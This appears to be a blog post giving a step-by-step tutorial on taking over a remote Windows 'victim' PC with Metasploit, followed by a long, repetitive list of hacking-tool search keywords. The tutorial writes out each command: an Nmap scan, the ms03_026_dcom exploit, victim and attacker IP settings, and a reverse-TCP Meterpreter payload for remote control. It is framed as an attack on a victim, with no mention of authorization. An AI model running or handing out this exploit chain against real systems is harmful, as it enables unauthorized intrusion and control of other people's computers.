Sunday, January 21, 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

More information


  1. Hacker Tools Free
  2. Hacking Tools For Pc
  3. Tools For Hacker
  4. Pentest Tools Linux
  5. Pentest Tools Online
  6. Termux Hacking Tools 2019
  7. Game Hacking
  8. How To Hack
  9. Hack Rom Tools
  10. Pentest Tools Bluekeep
  11. Pentest Recon Tools
  12. Hacker Tools Software
  13. Hacking Apps
  14. Hack Tool Apk No Root
  15. Hack App
  16. New Hacker Tools
  17. Pentest Tools Kali Linux
  18. Hack Tools Download
  19. Hack Tools For Games
  20. Hacker Tools Linux
  21. Pentest Tools Framework
  22. Bluetooth Hacking Tools Kali
  23. Hack App
  24. Hacker Tools For Pc
  25. Hacking Tools Software
  26. Pentest Tools Online
  27. Tools Used For Hacking
  28. Hack Tools For Windows
  29. Pentest Tools Free
  30. Pentest Tools For Android
  31. Hacker Search Tools
  32. Hack And Tools
  33. Hacker Tools Windows
  34. Pentest Tools For Mac
  35. Hacking Tools Name
  36. New Hack Tools
  37. Hacker Search Tools
  38. Pentest Tools Tcp Port Scanner
  39. Pentest Tools Free
  40. Computer Hacker
  41. Hacker Security Tools
  42. Hacker Tools Github
  43. How To Hack
  44. Black Hat Hacker Tools
  45. Hacker Tool Kit
  46. Hack Tools For Ubuntu
  47. Best Hacking Tools 2020
  48. Pentest Tools Subdomain
  49. Hacker
  50. Hacking Tools 2020
  51. Hacks And Tools
  52. Hacker Tool Kit
  53. Hack Tools Online
  54. Top Pentest Tools
  55. Hacking Tools Mac
  56. Hacking Tools And Software
  57. Kik Hack Tools
  58. Hacker Tools Software
  59. Pentest Tools Port Scanner
  60. Hack And Tools
  61. Termux Hacking Tools 2019
  62. Hacking Tools For Games
  63. Hacker Tools Software
  64. Hack App
  65. Hacking Tools For Mac
  66. Hacking Tools Pc
  67. What Is Hacking Tools
  68. Pentest Tools
  69. Blackhat Hacker Tools
  70. Hacking Tools Windows 10
  71. Hacker Security Tools
  72. Hacker Tools For Mac
  73. Hacker Search Tools
  74. Pentest Tools Alternative
  75. Best Hacking Tools 2020
  76. Hacker Tools Mac
  77. Hacker Tools Software
  78. Hacking Tools For Games
  79. Pentest Tools Framework
  80. Android Hack Tools Github
  81. Hack App
  82. Hacking Tools And Software

No comments: